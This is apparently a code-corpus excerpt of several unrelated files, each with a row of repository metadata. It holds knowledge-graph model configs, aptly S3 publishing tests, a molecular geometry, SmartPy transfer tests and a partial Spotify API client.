    parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
    parser.add_argument('--test_max_edges_per_node', type=int, default=200)
    parser.add_argument('--test_max_attended_nodes', type=int, default=20)
    parser.add_argument('--test_max_seen_nodes', type=int, default=200)
    parser.add_argument('--n_layers', type=int, default=2)
    parser.add_argument('--aggregate_op', default='mean_v3')
    parser.add_argument('--uncon_steps', type=int, default=1)
    parser.add_argument('--con_steps', type=int, default=6)
    parser.add_argument('--max_epochs', type=int, default=1)
    parser.add_argument('--learning_rate', type=float, default=0.001)
    parser.add_argument('--clipnorm', type=float, default=1.)
    parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=False)
    parser.add_argument('--timer', action='store_true', default=False)
    parser.add_argument('--print_train', action='store_true', default=True)
    parser.add_argument('--print_train_metric', action='store_true', default=True)
    parser.add_argument('--print_train_freq', type=int, default=1)
    parser.add_argument('--eval_within_epoch', default=[])
    parser.add_argument('--eval_valid', action='store_true', default=False)
    parser.add_argument('--moving_mean_decay', type=float, default=0.99)
    parser.add_argument('--test_output_attention', action='store_true', default=False)
    parser.add_argument('--test_analyze_attention', action='store_true', default=False)
    return parser
# WN18RR
def get_wn18rr_config(parser):
    parser.add_argument('--dataset', default='WN18RR')
    parser.add_argument('--n_dims_sm', type=int, default=50)
    parser.add_argument('--n_dims', type=int, default=100)
    parser.add_argument('--batch_size', type=int, default=100)
    parser.add_argument('--max_edges_per_example', type=int, default=10000)
    parser.add_argument('--max_edges_per_node', type=int, default=200)
    parser.add_argument('--max_attended_nodes', type=int, default=20)
    parser.add_argument('--max_seen_nodes', type=int, default=200)
    parser.add_argument('--test_batch_size', type=int, default=100)
    parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
    parser.add_argument('--test_max_edges_per_node', type=int, default=200)
    parser.add_argument('--test_max_attended_nodes', type=int, default=20)
    parser.add_argument('--test_max_seen_nodes', type=int, default=200)
    parser.add_argument('--n_layers', type=int, default=2)
    parser.add_argument('--aggregate_op', default='mean_v3')
    parser.add_argument('--uncon_steps', type=int, default=2)
    parser.add_argument('--con_steps', type=int, default=8)
    parser.add_argument('--max_epochs', type=int, default=1)
    parser.add_argument('--learning_rate', type=float, default=0.001)
    parser.add_argument('--clipnorm', type=float, default=1.)
    parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=False)
    parser.add_argument('--timer', action='store_true', default=False)
    parser.add_argument('--print_train', action='store_true', default=True)
    parser.add_argument('--print_train_metric', action='store_true', default=True)
    parser.add_argument('--print_train_freq', type=int, default=1)
    parser.add_argument('--eval_within_epoch', default=[])
    parser.add_argument('--eval_valid', action='store_true', default=False)
    parser.add_argument('--moving_mean_decay', type=float, default=0.99)
    parser.add_argument('--test_output_attention', action='store_true', default=False)
    parser.add_argument('--test_analyze_attention', action='store_true', default=False)
    return parser
# WN
def get_wn_config(parser):
    parser.add_argument('--dataset', default='WN')
    parser.add_argument('--n_dims_sm', type=int, default=50)
    parser.add_argument('--n_dims', type=int, default=100)
    parser.add_argument('--batch_size', type=int, default=100)
    parser.add_argument('--max_edges_per_example', type=int, default=10000)
    parser.add_argument('--max_edges_per_node', type=int, default=200)
    parser.add_argument('--max_attended_nodes', type=int, default=20)
    parser.add_argument('--max_seen_nodes', type=int, default=200)
    parser.add_argument('--test_batch_size', type=int, default=100)
    parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
    parser.add_argument('--test_max_edges_per_node', type=int, default=200)
    parser.add_argument('--test_max_attended_nodes', type=int, default=20)
    parser.add_argument('--test_max_seen_nodes', type=int, default=200)
    parser.add_argument('--n_layers', type=int, default=2)
    parser.add_argument('--aggregate_op', default='mean_v3')
    parser.add_argument('--uncon_steps', type=int, default=1)
    parser.add_argument('--con_steps', type=int, default=8)
    parser.add_argument('--max_epochs', type=int, default=1)
    parser.add_argument('--learning_rate', type=float, default=0.001)
    parser.add_argument('--clipnorm', type=float, default=1.)
    parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=False)
    parser.add_argument('--timer', action='store_true', default=False)
    parser.add_argument('--print_train', action='store_true', default=True)
    parser.add_argument('--print_train_metric', action='store_true', default=True)
    parser.add_argument('--print_train_freq', type=int, default=1)
    parser.add_argument('--eval_within_epoch', default=[])
    parser.add_argument('--eval_valid', action='store_true', default=False)
    parser.add_argument('--moving_mean_decay', type=float, default=0.99)
    parser.add_argument('--test_output_attention', action='store_true', default=False)
    parser.add_argument('--test_analyze_attention', action='store_true', default=False)
    return parser
# YAGO310
def get_yago310_config(parser):
    parser.add_argument('--dataset', default='YAGO310')
    parser.add_argument('--n_dims_sm', type=int, default=50)
    parser.add_argument('--n_dims', type=int, default=100)
    parser.add_argument('--batch_size', type=int, default=100)
    parser.add_argument('--max_edges_per_example', type=int, default=10000)
    parser.add_argument('--max_edges_per_node', type=int, default=200)
    parser.add_argument('--max_attended_nodes', type=int, default=20)
    parser.add_argument('--max_seen_nodes', type=int, default=200)
    parser.add_argument('--test_batch_size', type=int, default=100)
    parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
    parser.add_argument('--test_max_edges_per_node', type=int, default=200)
    parser.add_argument('--test_max_attended_nodes', type=int, default=20)
    parser.add_argument('--test_max_seen_nodes', type=int, default=200)
    parser.add_argument('--n_layers', type=int, default=2)
    parser.add_argument('--aggregate_op', default='mean_v3')
    parser.add_argument('--uncon_steps', type=int, default=1)
    parser.add_argument('--con_steps', type=int, default=6)
    parser.add_argument('--max_epochs', type=int, default=1)
    parser.add_argument('--learning_rate', type=float, default=0.0001)
    parser.add_argument('--clipnorm', type=float, default=1.)
    parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=False)
    parser.add_argument('--timer', action='store_true', default=False)
    parser.add_argument('--print_train', action='store_true', default=True)
    parser.add_argument('--print_train_metric', action='store_true', default=True)
    parser.add_argument('--print_train_freq', type=int, default=1)
    parser.add_argument('--eval_within_epoch', default=[])
    parser.add_argument('--eval_valid', action='store_true', default=False)
    parser.add_argument('--moving_mean_decay', type=float, default=0.99)
    parser.add_argument('--test_output_attention', action='store_true', default=False)
    parser.add_argument('--test_analyze_attention', action='store_true', default=False)
    return parser
# Nell995: for separate learning per subset
def get_nell995_separate_config(parser):
    parser.add_argument('--dataset', default='NELL995')
    parser.add_argument('--n_dims_sm', type=int, default=200)
    parser.add_argument('--n_dims', type=int, default=200)
    parser.add_argument('--batch_size', type=int, default=10)
    parser.add_argument('--max_edges_per_example', type=int, default=10000)
    parser.add_argument('--max_edges_per_node', type=int, default=1000)
    parser.add_argument('--max_attended_nodes', type=int, default=100)
    parser.add_argument('--max_seen_nodes', type=int, default=1000)
    parser.add_argument('--test_batch_size', type=int, default=10)
    parser.add_argument('--test_max_edges_per_example', type=int, default=10000)
    parser.add_argument('--test_max_edges_per_node', type=int, default=1000)
    parser.add_argument('--test_max_attended_nodes', type=int, default=100)
    parser.add_argument('--test_max_seen_nodes', type=int, default=1000)
    parser.add_argument('--n_layers', type=int, default=2)
    parser.add_argument('--aggregate_op', default='mean_v3')
    parser.add_argument('--uncon_steps', type=int, default=1)
    parser.add_argument('--con_steps', type=int, default=5)
    parser.add_argument('--max_epochs', type=int, default=3)
    parser.add_argument('--learning_rate', type=float, default=0.001)
    parser.add_argument('--clipnorm', type=float, default=1.)
    parser.add_argument('--remove_all_head_tail_edges', action='store_true', default=False)
    parser.add_argument('--timer', action='store_true', default=False)
    parser.add_argument('--print_train', action='store_true', default=True)
    parser.add_argument('--print_train_metric', action='store_true', default=True)
    parser.add_argument('--print_train_freq', type=int, default=1)
    parser.add_argument('--eval_within_epoch', default=[])
    parser.add_argument('--eval_valid', action='store_true', default=False)
    parser.add_argument('--moving_mean_decay', type=float, default=0.9)
    parser.add_argument('--test_output_attention', action='store_true', default=False)
    parser.add_argument('--test_analyze_attention', action='store_true', default=False)
    return parser
def get_default_config(name):
    parser = argparse.ArgumentParser()
    if name == 'FB237' or name == 'FB237_v2':
        return get_fb237_config(parser)
    elif name == 'FB15K':
        return get_fb15k_config(parser)
    elif name == 'OP' or name == 'OP3':
        return get_op_config(parser)
    elif name == 'WN18RR' or name == 'WN18RR_v2':
        return get_wn18rr_config(parser)
    elif name == 'WN':
        return get_wn_config(parser)
    elif name == 'YAGO310':
        return get_yago310_config(parser)
    elif name == 'NELL995':
        return get_nell995_separate_config(parser)
    else:
        raise ValueError('Invalid `name`')
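Since each per-dataset function only registers argparse defaults, a config object can be materialized by parsing an empty argument list, and individual hyperparameters can still be overridden from the command line. A self-contained sketch of that pattern (the `get_demo_config` helper is illustrative, not from the module above):

```python
import argparse

def get_demo_config(parser):
    # Mirrors the structure of the per-dataset config functions: every
    # hyperparameter is an argparse option with a dataset-specific default.
    parser.add_argument('--dataset', default='FB237')
    parser.add_argument('--batch_size', type=int, default=80)
    parser.add_argument('--learning_rate', type=float, default=0.001)
    return parser

parser = get_demo_config(argparse.ArgumentParser())
hparams = parser.parse_args([])                       # empty list -> pure defaults
overridden = parser.parse_args(['--batch_size', '32'])  # CLI-style override
```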
| 49.105263 | 91 | 0.729525 | 2,223 | 15,861 | 4.900135 | 0.045434 | 0.173506 | 0.327733 | 0.094464 | 0.950151 | 0.945745 | 0.945745 | 0.917837 | 0.908657 | 0.900211 | 0 | 0.030421 | 0.110901 | 15,861 | 322 | 92 | 49.257764 | 0.742022 | 0.004666 | 0 | 0.802469 | 0 | 0 | 0.263768 | 0.087395 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032922 | false | 0 | 0.004115 | 0 | 0.09465 | 0.08642 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
97be3387eb249babc9432ccfb6b56888b1ed62ae | 10,272 | py | Python | system/t06_publish/s3.py | steven-aerts/aptly | a64807efdaf5e380bfa878c71bc88eae10d62be1 | [
"MIT"
] | 1 | 2018-08-05T07:15:36.000Z | 2018-08-05T07:15:36.000Z | system/t06_publish/s3.py | steven-aerts/aptly | a64807efdaf5e380bfa878c71bc88eae10d62be1 | [
"MIT"
] | null | null | null | system/t06_publish/s3.py | steven-aerts/aptly | a64807efdaf5e380bfa878c71bc88eae10d62be1 | [
"MIT"
] | 1 | 2019-04-26T15:27:53.000Z | 2019-04-26T15:27:53.000Z | from s3_lib import S3Test
def strip_processor(output):
    return "\n".join([l for l in output.split("\n") if not l.startswith(' ') and not l.startswith('Date:')])
class S3Publish1Test(S3Test):
    """
    publish to S3: from repo
    """
    fixtureCmds = [
        "aptly repo create -distribution=maverick local-repo",
        "aptly repo add local-repo ${files}",
    ]
    runCmd = "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo s3:test1:"

    def check(self):
        super(S3Publish1Test, self).check()

        self.check_exists('public/dists/maverick/InRelease')
        self.check_exists('public/dists/maverick/Release')
        self.check_exists('public/dists/maverick/Release.gpg')

        self.check_exists('public/dists/maverick/main/binary-i386/Packages')
        self.check_exists('public/dists/maverick/main/binary-i386/Packages.gz')
        self.check_exists('public/dists/maverick/main/binary-i386/Packages.bz2')
        self.check_exists('public/dists/maverick/main/source/Sources')
        self.check_exists('public/dists/maverick/main/source/Sources.gz')
        self.check_exists('public/dists/maverick/main/source/Sources.bz2')

        self.check_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
        self.check_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
        self.check_exists('public/pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
        self.check_exists('public/pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
        self.check_exists('public/pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')

        # verify contents except for the checksums
        self.check_file_contents('public/dists/maverick/Release', 'release', match_prepare=strip_processor)
        self.check_file_contents('public/dists/maverick/main/source/Sources', 'sources', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
        self.check_file_contents('public/dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
class S3Publish2Test(S3Test):
    """
    publish to S3: publish update removed some packages
    """
    fixtureCmds = [
        "aptly repo create -distribution=maverick local-repo",
        "aptly repo add local-repo ${files}/",
        "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo s3:test1:",
        "aptly repo remove local-repo pyspi",
    ]
    runCmd = "aptly publish update -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec maverick s3:test1:"

    def check(self):
        super(S3Publish2Test, self).check()

        self.check_exists('public/dists/maverick/InRelease')
        self.check_exists('public/dists/maverick/Release')
        self.check_exists('public/dists/maverick/Release.gpg')

        self.check_exists('public/dists/maverick/main/binary-i386/Packages')
        self.check_exists('public/dists/maverick/main/binary-i386/Packages.gz')
        self.check_exists('public/dists/maverick/main/binary-i386/Packages.bz2')
        self.check_exists('public/dists/maverick/main/source/Sources')
        self.check_exists('public/dists/maverick/main/source/Sources.gz')
        self.check_exists('public/dists/maverick/main/source/Sources.bz2')

        self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
        self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
        self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
        self.check_not_exists('public/pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
        self.check_exists('public/pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')

        # verify contents except for the checksums
        self.check_file_contents('public/dists/maverick/Release', 'release', match_prepare=strip_processor)
        self.check_file_contents('public/dists/maverick/main/source/Sources', 'sources', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
        self.check_file_contents('public/dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
class S3Publish3Test(S3Test):
    """
    publish to S3: publish switch - removed some packages
    """
    fixtureDB = True
    fixturePool = True
    fixtureCmds = [
        "aptly snapshot create snap1 from mirror gnuplot-maverick",
        "aptly snapshot create snap2 empty",
        "aptly snapshot pull -no-deps -architectures=i386,amd64 snap2 snap1 snap3 gnuplot-x11",
        "aptly publish snapshot -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=maverick snap1 s3:test1:",
    ]
    runCmd = "aptly publish switch -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec maverick s3:test1: snap3"

    def check(self):
        super(S3Publish3Test, self).check()

        self.check_exists('public/dists/maverick/InRelease')
        self.check_exists('public/dists/maverick/Release')
        self.check_exists('public/dists/maverick/Release.gpg')

        self.check_exists('public/dists/maverick/main/binary-i386/Packages.gz')
        self.check_exists('public/dists/maverick/main/binary-i386/Packages.bz2')
        self.check_exists('public/dists/maverick/main/binary-amd64/Packages')
        self.check_exists('public/dists/maverick/main/binary-amd64/Packages.gz')
        self.check_exists('public/dists/maverick/main/binary-amd64/Packages.bz2')

        self.check_exists('public/pool/main/g/gnuplot/gnuplot-x11_4.6.1-1~maverick2_i386.deb')
        self.check_exists('public/pool/main/g/gnuplot/gnuplot-x11_4.6.1-1~maverick2_amd64.deb')
        self.check_not_exists('public/pool/main/g/gnuplot/gnuplot-nox_4.6.1-1~maverick2_i386.deb')
        self.check_not_exists('public/pool/main/g/gnuplot/gnuplot-nox_4.6.1-1~maverick2_amd64.deb')

        # verify contents except for the checksums
        self.check_file_contents('public/dists/maverick/Release', 'release', match_prepare=strip_processor)
        self.check_file_contents('public/dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
class S3Publish4Test(S3Test):
    """
    publish to S3: multiple repos, list
    """
    fixtureCmds = [
        "aptly repo create -distribution=maverick local-repo",
        "aptly repo add local-repo ${udebs}",
        "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo s3:test1:",
        "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=xyz local-repo s3:test1:",
        "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo s3:test1:prefix",
    ]
    runCmd = "aptly publish list"
class S3Publish5Test(S3Test):
    """
    publish to S3: publish drop - component cleanup
    """
    fixtureCmds = [
        "aptly repo create local1",
        "aptly repo create local2",
        "aptly repo add local1 ${files}/libboost-program-options-dev_1.49.0.1_i386.deb",
        "aptly repo add local2 ${files}",
        "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=sq1 local1 s3:test1:",
        "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=sq2 local2 s3:test1:",
    ]
    runCmd = "aptly publish drop sq2 s3:test1:"

    def check(self):
        super(S3Publish5Test, self).check()

        self.check_exists('public/dists/sq1')
        self.check_not_exists('public/dists/sq2')

        self.check_exists('public/pool/main/')
        self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
        self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
        self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
        self.check_not_exists('public/pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
        self.check_exists('public/pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')
class S3Publish6Test(S3Test):
    """
    publish to S3: publish update removed some packages with SSE AES256
    """
    s3Overrides = {'encryptionMethod': 'AES256'}
    fixtureCmds = [
        "aptly repo create -distribution=maverick local-repo",
        "aptly repo add local-repo ${files}/",
        "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo s3:test1:",
        "aptly repo remove local-repo pyspi",
    ]
    runCmd = "aptly publish update -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec maverick s3:test1:"

    def check(self):
        super(S3Publish6Test, self).check()

        self.check_exists('public/dists/maverick/InRelease')
        self.check_exists('public/dists/maverick/Release')
        self.check_exists('public/dists/maverick/Release.gpg')

        self.check_exists('public/dists/maverick/main/binary-i386/Packages')
        self.check_exists('public/dists/maverick/main/binary-i386/Packages.gz')
        self.check_exists('public/dists/maverick/main/binary-i386/Packages.bz2')
        self.check_exists('public/dists/maverick/main/source/Sources')
        self.check_exists('public/dists/maverick/main/source/Sources.gz')
        self.check_exists('public/dists/maverick/main/source/Sources.bz2')

        self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
        self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
        self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
        self.check_not_exists('public/pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
        self.check_exists('public/pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')

        # verify contents except for the checksums
        self.check_file_contents('public/dists/maverick/Release', 'release', match_prepare=strip_processor)
        self.check_file_contents('public/dists/maverick/main/source/Sources', 'sources', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
        self.check_file_contents('public/dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
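The `match_prepare=strip_processor` hook used above compares Release files while ignoring the per-file checksum entries and `Date:` headers, which change on every publish. A standalone illustration of what the helper keeps and drops:

```python
def strip_processor(output):
    # Same logic as the helper above: drop indented lines (checksum entries)
    # and Date: headers, keeping only the stable top-level fields.
    return "\n".join(l for l in output.split("\n")
                     if not l.startswith(' ') and not l.startswith('Date:'))

release = ("Origin: aptly\n"
           "Date: Sat, 01 Jan 2022 00:00:00 UTC\n"
           "SHA256:\n"
           " abc123 42 main/binary-i386/Packages\n")
stripped = strip_processor(release)
```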
| 51.878788 | 151 | 0.696456 | 1,441 | 10,272 | 4.863289 | 0.095073 | 0.100171 | 0.100599 | 0.140839 | 0.87871 | 0.861301 | 0.851313 | 0.844463 | 0.844463 | 0.82891 | 0 | 0.034277 | 0.150798 | 10,272 | 197 | 152 | 52.142132 | 0.769116 | 0.03972 | 0 | 0.601449 | 0 | 0.268116 | 0.564336 | 0.425939 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.007246 | 0.007246 | 0.210145 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8af4c472dd122e1ba1a6e7bdc7894a4931eaa68e | 3,639 | py | Python | lib/systems/tetrabenzoporphyrin.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | [
"BSD-3-Clause"
] | null | null | null | lib/systems/tetrabenzoporphyrin.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | [
"BSD-3-Clause"
] | null | null | null | lib/systems/tetrabenzoporphyrin.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | [
"BSD-3-Clause"
] | null | null | null | import pulsar as psr
def load_ref_system():
""" Returns tetrabenzoporphyrin as found in the IQMol fragment library.
All credit to https://github.com/nutjunkie/IQmol
"""
return psr.make_system("""
C -4.30262 0.68532 -0.00000
C -4.30262 -0.68532 -0.00000
C -2.89957 -1.10343 -0.00000
C -2.89957 1.10343 -0.00000
N -2.11177 0.00000 -0.00000
C -2.45081 2.45264 -0.00000
C -1.09559 2.88682 -0.00000
N 0.00000 2.08730 -0.00000
C 1.09559 2.88682 -0.00000
C -0.68678 4.21163 -0.00000
C 0.68678 4.21163 -0.00000
C 2.45081 2.45264 -0.00000
C 2.89957 1.10343 0.00000
N 2.11177 -0.00000 0.00000
C 4.30262 -0.68532 0.00000
C 4.30262 0.68532 0.00000
C 1.09559 -2.88682 0.00000
N -0.00000 -2.08730 0.00000
C -1.09559 -2.88682 0.00000
C -0.68678 -4.21163 0.00000
C 0.68678 -4.21163 0.00000
C -2.45081 -2.45264 0.00000
C 2.45081 -2.45264 0.00000
C 2.89957 -1.10343 0.00000
C -5.49170 1.41501 -0.00000
C -5.49170 -1.41501 -0.00000
H -3.21793 3.21782 -0.00000
H 0.00000 1.05966 -0.00000
C -1.41620 5.40436 -0.00000
C 1.41620 5.40436 -0.00000
H 3.21793 3.21782 0.00000
C 5.49170 -1.41501 0.00000
C 5.49170 1.41501 0.00000
H -0.00000 -1.05966 0.00000
C -1.41620 -5.40436 0.00000
C 1.41620 -5.40436 0.00000
H -3.21793 -3.21782 -0.00000
H 3.21793 -3.21782 0.00000
C -0.70580 6.61775 -0.00000
C 0.70580 6.61775 -0.00000
C 6.70585 -0.70591 0.00000
C 6.70585 0.70591 0.00000
C -0.70580 -6.61775 0.00000
C 0.70580 -6.61775 0.00000
C -6.70585 0.70591 -0.00000
C -6.70585 -0.70591 -0.00000
H -5.48680 2.49618 -0.00000
H -5.48680 -2.49618 -0.00000
H -2.49751 5.40652 -0.00000
H 2.49751 5.40652 -0.00000
H 5.48680 -2.49618 0.00000
H 5.48680 2.49618 0.00000
H -2.49751 -5.40652 0.00000
H 2.49751 -5.40652 0.00000
H -1.24413 7.55659 -0.00000
H 1.24413 7.55659 -0.00000
H 7.64419 -1.24462 0.00000
H 7.64419 1.24462 0.00000
H -1.24413 -7.55659 0.00000
H 1.24413 -7.55659 0.00000
H -7.64419 1.24462 -0.00000
H -7.64419 -1.24462 -0.00000
""")
8af9673b19cf817cc9e085d9ac0b1ececa42c76a | 3,290 | py | Python | utests/mutez_transfer.py | CreativeBlockchainDevelopers/tezos-artblocks | a25dee4cff6e3c0a49565435a473717b37af01eb | ["MIT"] | 2 | 2021-11-12T09:56:40.000Z | 2022-03-21T22:33:25.000Z | import smartpy as sp

def run_tests_mutez_transfer(config):
scenario = sp.test_scenario()
admin, [alice, bob] = get_addresses()
scenario.h1("Tests mutez transfer")
scenario.table_of_contents()
#-----------------------------------------------------
scenario.h2("Admin cashes out all contract's mutez")
contract = create_new_contract(config, admin, scenario, [alice])
contract.mutez_transfer(
amount=sp.mutez(1000000),
destination=admin.address,
).run(sender=admin)
scenario.verify(contract.balance == sp.mutez(0))
#-----------------------------------------------------
scenario.h2("Admin cashes out partial contract's mutez")
contract = create_new_contract(config, admin, scenario, [alice])
contract.mutez_transfer(
amount=sp.mutez(1),
destination=admin.address,
).run(sender=admin)
scenario.verify(contract.balance == sp.mutez(999999))
#-----------------------------------------------------
scenario.h2("Admin cashes out more mutez than possible")
contract = create_new_contract(config, admin, scenario, [alice])
contract.mutez_transfer(
amount=sp.mutez(2000000),
destination=admin.address,
).run(sender=admin, valid=False)
#-----------------------------------------------------
scenario.h2("Bob tries to cash out")
contract = create_new_contract(config, admin, scenario, [alice])
contract.mutez_transfer(
amount=sp.mutez(1),
destination=bob.address,
).run(sender=bob, valid=False)
scenario.verify(contract.balance == sp.mutez(1000000))
#-----------------------------------------------------
scenario.h2("Bob tries to cash out more than possible")
contract = create_new_contract(config, admin, scenario, [alice])
contract.mutez_transfer(
amount=sp.mutez(2000000),
destination=bob.address,
).run(sender=bob, valid=False)
scenario.verify(contract.balance == sp.mutez(1000000))
#-----------------------------------------------------
scenario.h2("Admin cashes out in several time")
contract = create_new_contract(config, admin, scenario, [alice])
contract.mutez_transfer(
amount=sp.mutez(500000),
destination=bob.address,
).run(sender=admin)
scenario.verify(contract.balance == sp.mutez(500000))
scenario.h3("Bob tries to cash out")
contract.mutez_transfer(
amount=sp.mutez(500000),
destination=bob.address,
).run(sender=bob, valid=False)
scenario.verify(contract.balance == sp.mutez(500000))
contract.mutez_transfer(
amount=sp.mutez(499999),
destination=bob.address,
).run(sender=admin)
scenario.verify(contract.balance == sp.mutez(1))
contract.mutez_transfer(
amount=sp.mutez(100),
destination=bob.address,
).run(sender=admin, valid=False)
scenario.verify(contract.balance == sp.mutez(1))
contract.mutez_transfer(
amount=sp.mutez(1),
destination=bob.address,
).run(sender=admin)
scenario.verify(contract.balance == sp.mutez(0))
contract.mutez_transfer(
amount=sp.mutez(100),
destination=bob.address,
).run(sender=admin, valid=False)
scenario.verify(contract.balance == sp.mutez(0))
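The scenarios above exercise two invariants: only the admin may transfer, and the requested amount may not exceed the contract balance. A plain-Python model of those checks — hypothetical, outside SmartPy, assuming the contract starts funded with 1,000,000 mutez as in the tests:

```python
def mutez_transfer(balance, amount, sender, admin="admin"):
    """Model of the contract's checks: admin-only, amount <= balance."""
    if sender != admin or amount > balance:
        return balance, False  # transfer rejected, balance unchanged
    return balance - amount, True

# mirrors "Admin cashes out all contract's mutez"
assert mutez_transfer(1_000_000, 1_000_000, "admin") == (0, True)
# mirrors "Bob tries to cash out"
assert mutez_transfer(1_000_000, 1, "bob") == (1_000_000, False)
```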
c105e44c0553778a0b716b3fd3e2399a3245cc86 | 9,675 | py | Python | src/async_spotify/api/_endpoints/library.py | wackazong/AsyncSpotify | 2789331bac471327738a4fec13e3d106c1da0ea1 | ["MIT"] | 26 | 2020-04-01T14:16:28.000Z | 2022-02-23T18:28:23.000Z | """
Module with the library endpoint
"""
# ##################################################################################################
# Copyright (c) 2020. HuiiBuh #
# This file (library.py) is part of AsyncSpotify which is released under MIT. #
# You are not allowed to use this code or this file for another project without #
# linking to the original source. #
# ##################################################################################################
from typing import List
from .endpoint import Endpoint
from .urls import URLS
from ...authentification.spotify_authorization_token import SpotifyAuthorisationToken
class Library(Endpoint):
"""
Library endpoint
"""
async def contains_albums(self, album_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) \
-> List[bool]:
"""
Check Current User's Saved Albums
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/check-users-saved-albums/](https://developer.spotify.com/documentation/web-api/reference/library/check-users-saved-albums/)
Args:
album_id_list: The ids of the albums
auth_token: The auth token if you set the api class not to keep the token in memory
Returns:
Does the user library contain the Album
"""
return await self.api_request_handler.make_request('GET', URLS.LIBRARY.CONTAINS_ALBUM,
{'ids': album_id_list}, auth_token)
async def contains_shows(self, show_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) -> List[bool]:
"""
Check Current User's Saved Shows
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/check-users-saved-shows/](https://developer.spotify.com/documentation/web-api/reference/library/check-users-saved-shows/)
Args:
            show_id_list: The ids of the shows
auth_token: The auth token if you set the api class not to keep the token in memory
Returns:
Does the user library contain the Show
"""
return await self.api_request_handler.make_request('GET', URLS.LIBRARY.CONTAINS_SHOWS,
{'ids': show_id_list}, auth_token)
async def contains_tracks(self, track_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) \
-> List[bool]:
"""
Check Current User's Saved Tracks
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/check-users-saved-tracks/](https://developer.spotify.com/documentation/web-api/reference/library/check-users-saved-tracks/)
Args:
            track_id_list: The ids of the tracks
auth_token: The auth token if you set the api class not to keep the token in memory
Returns:
Does the user library contain the Track
"""
return await self.api_request_handler.make_request('GET', URLS.LIBRARY.CONTAINS_TRACK,
{'ids': track_id_list}, auth_token)
async def get_albums(self, auth_token: SpotifyAuthorisationToken = None, **kwargs) -> dict:
"""
        Get User's Saved Albums
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/get-users-saved-albums/](https://developer.spotify.com/documentation/web-api/reference/library/get-users-saved-albums/)
Args:
auth_token: The auth token if you set the api class not to keep the token in memory
kwargs: Optional arguments as keyword args
"""
